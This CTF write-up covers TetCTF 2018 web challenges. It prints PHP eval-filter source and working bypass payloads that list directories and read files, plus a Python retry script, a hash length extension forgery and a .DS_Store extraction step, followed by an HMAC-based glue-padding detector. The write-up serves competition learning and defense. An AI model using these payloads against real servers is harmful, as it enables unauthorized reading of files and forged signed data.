TetCTF - 2018

Web - PHPlimit Revenge

filter.php
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
    if(preg_match('/_|m|info|get/i',$_GET['code']))
    {
        die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
    }
    else
    {
        eval($_GET['code']);
    }
}
else
{
    show_source(__FILE__);
}
?>

I am not familiar with PHP code, but with the mindset of an RE-er... then JUST FUCKING DO IT!

Btw, I joined a while after the contest started (9 AM 4/1/2018), so they had already released phplimit revenge 2; I just needed to read which funcs are filtered by 2 and use them to create my payload.

payload1
import requests
url = "http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(rand()))))));"
r = requests.get(url)
# chr(rand()) only sometimes yields '.', so retry until the response is non-empty
while len(r.content) == 0:
    r = requests.get(url)
print(r.content)
payload2
#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
flag
<?php
$fl0wer="TetCTF{_Limbo_Escaped!_Welcome_back_to_Real_Life_}";
?>

Web - PHPlimit revenge 2

filter
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
    if(preg_match('/_|m|info|get|strlen|rand|path/i',$_GET['code']))
    {
        die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
    }
    else
    {
        eval($_GET['code']);
    }
}
else
{
    show_source(__FILE__);
}
?>

In this challenge, you couldn't use rand() anymore, so to get ".", I use localeconv().

With scandir(), I can print all files in the current directory.

Checking the content of the file well_play_but_flag_not_here.php:

#view-source:http://45.76.181.81/?code=print(readfile(end(scandir(current(localeconv())))));
<?php
$fl0wer="Flag not here! go to directory's parent directory";
?>

Checking the parent folder "..":

Found the flag, now I chdir() to the parent directory:

chdir() succeeded, now I need to create '.' from 1. Here I use some math functions in PHP like sqrt(), exp(), sin(), cos(),...

I love calculatin! <3

I use e^1 = 2.7x

I use ord('2') = 50

I use sqrt(50) = 7.x

I use ceil(7.x) = 8

ord('8') = 56

octdec(56) = 46

chr(46) = '.', so I got '.' huehuehuehue

exp(1) = e^1 = 2.xxxx
ord(2) = 50
sqrt(50) = 7.xx
ceil(7.x) = 8
ord('8') = 56
octdec(56) = 46
chr(46) = '.'

From here on, it is similar to phplimit revenge 1: just read the flag. Final payload:

final-payload
view-source:http://45.76.181.81/?code=print(readfile(end(scandir(chr(octdec(ord(ceil(sqrt(ord(exp(chdir(next(scandir(current(localeconv())))))))))))))));
flag
<?php
$flower="TetCTF{__Hey___PhP___Master___}";
?>
Thanks @Ariana for teaching me to think in multiple bases/dimensions

Web - IQ Test 2

challenge.php
https://pastebin.com/7zdc5DNX

This is a challenge about hash length extension. I used the tool below to calculate saved and hash for level13:

https://github.com/iagox86/hash_extender
payload
hash: 6ac223512cea8d11c0fdf14dccbfbe62
saved: c2VlZD10cnVlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAAmbGV2ZWw9eGlpaQ==

Now I have hash and saved, so I created the request with Burp Suite

Finally

TetCTF{__Happy_new_Y3aR__!!_H3re_Your_Flower_}
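
What a length-extended value looks like from the server side, as an added example (not code from the challenge or from hash_extender): the detector flags MD5 glue padding inside a decoded `saved` parameter, and `sign`/`verify` show the HMAC construction that removes the weakness. It assumes the challenge computes an MD5 over a secret prefix plus `saved`; the sample input, key and function names are constructed for illustration.

```python
import base64
import hashlib
import hmac

BLOCK = 64  # MD5 block size in bytes

# Constructed sample laid out like the `saved` value above: data, padding, appended data.
SAMPLE = base64.b64encode(
    b"seed=true" + b"\x80" + b"\x00" * 35 + (160).to_bytes(8, "little") + b"&level=xiii"
).decode()


def find_glue_padding(saved_b64):
    """Return the parts of a value that embeds MD5 glue padding, or None."""
    data = base64.b64decode(saved_b64)
    for i, byte in enumerate(data):
        if byte != 0x80:
            continue
        # Padding is 0x80, a run of zeros, then the 8-byte little-endian bit length.
        for end in range(i + 9, min(len(data), i + BLOCK + 8) + 1):
            if any(data[i + 1:end - 8]):
                break  # non-zero byte inside the zero run: not padding
            bits = int.from_bytes(data[end - 8:end], "little")
            prefix_len = bits // 8 - i  # bytes hashed ahead of the visible data
            # Real padding ends exactly on a block boundary of prefix + data.
            if bits % 8 == 0 and prefix_len >= 0 and (prefix_len + end) % BLOCK == 0:
                return {"original": data[:i], "appended": data[end:],
                        "secret_len": prefix_len}
    return None


def sign(key, data):
    """HMAC-SHA256 tag; unlike hash(secret + data) it cannot be extended."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify(key, data, tag):
    """Constant-time check of a tag produced by sign()."""
    return hmac.compare_digest(sign(key, data), tag)


if __name__ == "__main__":
    print(find_glue_padding(SAMPLE))
```

A legitimate client never needs to send 0x80, a zero run and a length field inside its own data, so a hit from `find_glue_padding` on a signed parameter is a strong signal worth logging even after the MAC is switched to HMAC.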

Web - File

I already met this kind of challenge before in Matesctf 2018 round 2

Tried dirsearch :

Extract the file /.DS_Store with this tool:

https://github.com/lijiejie/ds_store_exp

Check h1ddenn

flag
TetCTF{__DS_Store__seems_sad__}

Last words & Credits

My dream team! <3